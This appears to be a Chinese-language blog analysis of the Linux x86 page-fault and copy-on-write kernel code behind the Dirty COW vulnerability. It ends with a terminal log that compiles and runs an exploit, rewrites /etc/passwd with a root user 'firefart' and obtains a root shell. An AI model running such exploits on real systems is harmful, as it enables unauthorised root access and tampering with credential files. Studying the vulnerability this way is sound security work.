/* * We fault-in kernel-space virtual memory on-demand. The * 'reference' page table is init_mm.pgd. * * NOTE! We MUST NOT take any locks for this case. We may * be in an interrupt or a critical region, and should * only copy the information from the master page table, * nothing more. * * This verifies that the fault happens in kernel space * (error_code & 4) == 0, and that the fault was not a * protection error (error_code & 9) == 0. */ if (unlikely(fault_in_kernel_space(address))) { if (!(error_code & (PF_RSVD | PF_USER | PF_PROT))) {//三个标志位都无说明是内核触发的内核空间的缺页异常 if (vmalloc_fault(address) >= 0) return;
这部分判断page fault是否发生在kernel部分的内存,vmalloc处理内核态的异常
1 2 3
/* Can handle a stale RO->RW TLB: */ if (spurious_fault(error_code, address)) return;
kernel 的page fault也可能是TLB flush导致的虚假的page fault
1 2 3 4 5
/* * Don't take the mm semaphore here. If we fixup a prefetch * fault we could otherwise deadlock: */ bad_area_nosemaphore(regs, error_code, address);
非法地址访问产生的异常,比如用户态访问kernel的地址
1 2
if (unlikely(error_code & PF_RSVD)) pgtable_bad(regs, error_code, address);
从这里开始是用户态,首先是页表错误
1 2 3 4
if (unlikely(smap_violation(error_code, regs))) { bad_area_nosemaphore(regs, error_code, address); return; }
这是在处理内核访问用户态地址的异常
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
/* * It's safe to allow irq's after cr2 has been saved and the * vmalloc fault has been handled. * * User-mode registers count as a user access even for any * potential system fault or CPU buglet: */ if (user_mode(regs)) { local_irq_enable(); error_code |= PF_USER; flags |= FAULT_FLAG_USER; } else { if (regs->flags & X86_EFLAGS_IF) local_irq_enable(); }
设置是由用户态引起的page fault的标志位
1 2
if (error_code & PF_WRITE) flags |= FAULT_FLAG_WRITE;
缺页异常是由写操作引起的
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
if (unlikely(!down_read_trylock(&mm->mmap_sem))) { if ((error_code & PF_USER) == 0 && !search_exception_tables(regs->ip)) { bad_area_nosemaphore(regs, error_code, address); return; } retry: down_read(&mm->mmap_sem); } else { /* * The above down_read_trylock() might have succeeded in * which case we'll have missed the might_sleep() from * down_read(): */ might_sleep(); }
这部分代码在给尽成的内存描述符上锁
1 2 3 4 5 6 7
vma = find_vma(mm, address); if (unlikely(!vma)) { bad_area(regs, error_code, address); return; } if (likely(vma->vm_start <= address)) goto good_area;
if (reuse_swap_page(old_page)) { /* * The page is all ours. Move it to our anon_vma so * the rmap code will not search our parent or siblings. * Protected against the rmap code by the page lock. */ page_move_anon_rmap(old_page, vma, address); unlock_page(old_page); return wp_page_reuse(mm, vma, address, page_table, ptl, orig_pte, old_page, 0, 0); }
... retry: /* * If we have a pending SIGKILL, don't keep faulting pages and * potentially allocating memory. */ if (unlikely(fatal_signal_pending(current))) return i ? i : -ERESTARTSYS; cond_resched(); page = follow_page_mask(vma, start, foll_flags, &page_mask); if (!page) { int ret; ret = faultin_page(tsk, vma, start, &foll_flags, nonblocking); switch (ret) { case0: goto retry; ...
[test@localhost ~]$ gcc -pthread pwn.c -o dirty -lcrypt [test@localhost ~]$ ls dirty pwn.c [test@localhost ~]$ ./dirty /etc/passwd successfully backed up to /tmp/passwd.bak Please enter the new password: Complete line: firefart:fik57D3GJz/tk:0:0:pwned:/root:/bin/bash
mmap: 7fb864ede000 madvise 0
ptrace 0 Done! Check /etc/passwd to see if the new user was created. You can login with the username 'firefart' and the password 'firefart'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd [test@localhost ~]$ su firefart Password: [firefart@localhost test]#